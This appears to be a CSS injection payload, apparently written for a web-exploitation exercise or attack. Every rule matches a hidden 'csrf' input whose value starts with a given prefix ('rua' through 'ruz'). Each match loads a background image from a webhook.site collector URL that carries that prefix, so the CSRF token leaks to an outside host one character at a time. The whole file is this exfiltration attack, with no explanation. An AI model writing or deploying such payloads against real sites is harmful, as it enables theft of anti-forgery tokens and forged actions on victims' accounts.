input[name=csrf][value^=rua]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/rua);
}
input[name=csrf][value^=rub]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/rub);
}
input[name=csrf][value^=ruc]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/ruc);
}
input[name=csrf][value^=rud]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/rud);
}
input[name=csrf][value^=rue]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/rue);
}
input[name=csrf][value^=ruf]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/ruf);
}
input[name=csrf][value^=rug]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/rug);
}
input[name=csrf][value^=ruh]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/ruh);
}
input[name=csrf][value^=rui]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/rui);
}
input[name=csrf][value^=ruj]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/ruj);
}
input[name=csrf][value^=ruk]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/ruk);
}
input[name=csrf][value^=rul]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/rul);
}
input[name=csrf][value^=rum]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/rum);
}
input[name=csrf][value^=run]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/run);
}
input[name=csrf][value^=ruo]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/ruo);
}
input[name=csrf][value^=rup]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/rup);
}
input[name=csrf][value^=ruq]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/ruq);
}
input[name=csrf][value^=rur]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/rur);
}
input[name=csrf][value^=rus]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/rus);
}
input[name=csrf][value^=rut]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/rut);
}
input[name=csrf][value^=ruu]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/ruu);
}
input[name=csrf][value^=ruv]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/ruv);
}
input[name=csrf][value^=ruw]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/ruw);
}
input[name=csrf][value^=rux]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/rux);
}
input[name=csrf][value^=ruy]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/ruy);
}
input[name=csrf][value^=ruz]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/ruz);
}
